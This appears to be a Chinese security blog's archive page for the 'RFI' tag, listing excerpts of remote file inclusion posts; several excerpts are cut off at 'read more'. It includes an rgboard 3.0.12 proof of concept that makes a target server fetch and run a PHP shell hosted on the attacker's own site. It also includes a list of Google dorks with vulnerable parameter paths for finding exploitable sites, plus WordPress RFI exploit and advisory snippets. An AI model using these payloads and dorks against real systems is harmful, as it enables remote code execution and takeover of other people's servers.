标签 ‘RFI’ 下的日志
rgboard 3.0.12 远程文件包含漏洞
鬼仔:昨天有事出去了下,家里宽带到期了,我竟然不知道,晚上回来之后才发现的,今天去交了费,所以更新没跟上。
Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]
rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php:
if (!defined(‘BBS_LIB_INC_INCLUDED’)) {
define(‘BBS_LIB_INC_INCLUDED’, 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/
PHP Security-Shell RFI Scanner
鬼仔注:代码放到txt里了。
来源:cnfjhh
本地RFI检测文件工具,可以方便的查找有问题的文件,快速挖掘php远程包含漏洞的利器。
eg:
PHP scanner.php secow
scanner.php and secow 要和PHP环境放在一起,其中secow指的所要检测的php程序文件夹
scanner.php的完整代码如下:
article_1471_code.txt
WordPress v2.1.3 >> remote file include
鬼仔注:前两天看到的,一直考虑要不要放上来,因为我测试没有成功,只是爆出了物理路径(文章末尾附图)。有测试成功的说明下。
来源:SecurityFocus
by : www.hackeraz.ir userz , saeid…
++++++++++++++++++++++++++++++++++++
####################################################
#WordPress >> 2.1.3 Remote File Inclusion #
####################################################
Affected Software .: WordPress >> 2.1.3 #
阅读全文 »
包含文件漏洞详解
作者:IceskYsl@1st
来源:天马行空{1.S.T}(http://www.1steam.cn)/
申明:本站原创,欢迎转载,请注明来源天马行空{1.S.T}(http://www.1steam.cn)/
=============
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。几乎所有的cgi程序都有这样的 bug,只是具体的表现方式不一样罢了。
一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕
include() && require()语句:包括并运行指定文件。
阅读全文 »
Remote File Inclusion list [ with d0rkz ]
来源:x140yu
1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=
2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=
4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=
阅读全文 »
WordPress functions.php脚本远程文件包含漏洞
受影响系统:
WordPress 2.0.5
描述:
——————————————————————————–
BUGTRAQ ID: 21004
WordPress是一款免费的论坛Blog系统。
WordPress处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
WordPress的functions.php脚本没有正确地验证file变量的数据,允许攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。
<*来源:_ANtrAX_*>
测试方法:
——————————————————————————–
阅读全文 »